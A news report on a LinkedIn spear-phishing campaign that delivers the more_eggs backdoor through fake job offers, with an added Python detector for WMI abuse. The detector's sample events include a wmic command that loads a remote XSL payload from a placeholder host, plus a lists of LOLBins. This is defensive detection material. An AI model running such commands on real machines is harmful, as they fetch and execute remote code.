Security researchers have revealed a new spear-phishing campaign designed to install Trojan malware on the devices of LinkedIn users.
The researchers warn job hunters to be cautious of unsolicited job offers.
The eSentire Threat Response Unit (TRU) reported that individuals were being targeted with customized files bearing the same name as their own current job title.
When a target opens the fake job offer, they unwittingly trigger the stealthy installation of the fileless backdoor more_eggs. Once loaded, the backdoor can download additional malicious plugins and give the operator hands-on access to the victim’s computer.
The threat actors behind more_eggs, Golden Chickens, sell the backdoor under a malware-as-a-service (MaaS) arrangement to other cybercriminals.
Once more_eggs is installed, Golden Chickens customers can use the backdoor to further their own campaigns by delivering additional malware such as ransomware, credential stealers and banking Trojans. The backdoor access could also be used to locate and collect sensitive data from the victim’s machine.
The attackers are believed to be taking advantage of the large number of COVID-19 redundancies in the US to spread this email campaign. Naming the malicious Zip file after the victim’s own LinkedIn job title increases the chance that they will open it.
The Trojan also abuses legitimate Windows components such as Windows Management Instrumentation (WMI) to evade detection by traditional antivirus tools.
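Because the backdoor rides on legitimate WMI components rather than dropping a conventional executable, signature-based antivirus has little to match on; a process-lineage check is the kind of control that does catch this class of activity. The following is an added example written for this page, not code from eSentire or from the campaign itself: it runs generic WMI-abuse heuristics over a few constructed, Sysmon-style process-creation events (the field names `Image`, `ParentImage` and `CommandLine` and the sample events are assumptions for illustration, and the rules describe common WMI living-off-the-land patterns, not the specific behaviour of more_eggs).

```python
"""Flag process-creation events that show WMI being used to launch code.

Added example for this page. Generic WMI-abuse heuristics over
Sysmon-style Event ID 1 records (field layout is an assumption); the
sample events below are constructed, not captured from a real incident.
"""
import json
from typing import Dict, Iterable, List, Tuple

# Script hosts and LOLBins that should rarely be children of WMI components.
SCRIPT_HOSTS = {
    "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
    "mshta.exe", "regsvr32.exe", "rundll32.exe", "cmd.exe", "msiexec.exe",
}

# WMI components that can act as the parent of attacker-initiated commands.
WMI_PARENTS = {"wmiprvse.exe", "wmic.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules an event matches (empty if none)."""
    hits: List[str] = []
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "").lower()

    # Rule 1: a WMI component spawns a script host / LOLBin.
    if parent in WMI_PARENTS and image in SCRIPT_HOSTS:
        hits.append("wmi_spawns_script_host")

    # Rule 2: wmic.exe told to render output through an XSL stylesheet,
    # which lets script embedded in the stylesheet execute.
    if image == "wmic.exe" and "/format:" in cmdline and (
        "http" in cmdline or ".xsl" in cmdline
    ):
        hits.append("wmic_xsl_format")

    # Rule 3: wmic.exe used to start a process ("process call create").
    if image == "wmic.exe" and all(t in cmdline for t in ("process", "call", "create")):
        hits.append("wmic_process_create")

    return hits


def scan(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Run every rule over JSON-lines events; skip blank or malformed lines."""
    findings: List[Tuple[int, str, str]] = []
    for n, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a malformed line must not abort the whole scan
        for rule in evaluate(event):
            findings.append((n, rule, _basename(event.get("Image", ""))))
    return findings


# Constructed sample events (assumption: Sysmon-like field names).
SAMPLE_EVENTS = [
    r'{"Image": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "WINWORD.EXE /n"}',
    r'{"Image": "C:\\Windows\\System32\\wscript.exe", "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "CommandLine": "wscript.exe //nologo C:\\Users\\alice\\AppData\\Local\\Temp\\update.js"}',
    r'{"Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "wmic os get /format:\"https://example.invalid/payload.xsl\""}',
    r'{"Image": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", "ParentImage": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"}',
    r'{"Image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "wmic process call create \"notepad.exe\""}',
]


if __name__ == "__main__":
    for line_no, rule, image in scan(SAMPLE_EVENTS):
        print(f"line {line_no}: {rule} ({image})")
```

Event 4 (WmiPrvSE.exe started by svchost.exe) is deliberately left unflagged: the WMI provider host itself is normal, and alerting on it would drown the rule in noise. The signal is in what it spawns, which is why rule 1 keys on the parent-child pair rather than on either process alone.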
eSentire noted that this campaign resembles a 2019 campaign in which employees of US retail, entertainment and pharmaceutical companies were targeted with the same more_eggs Trojan, disguised as a job offer matching their current position.
It remains unclear who is behind the Golden Chickens group.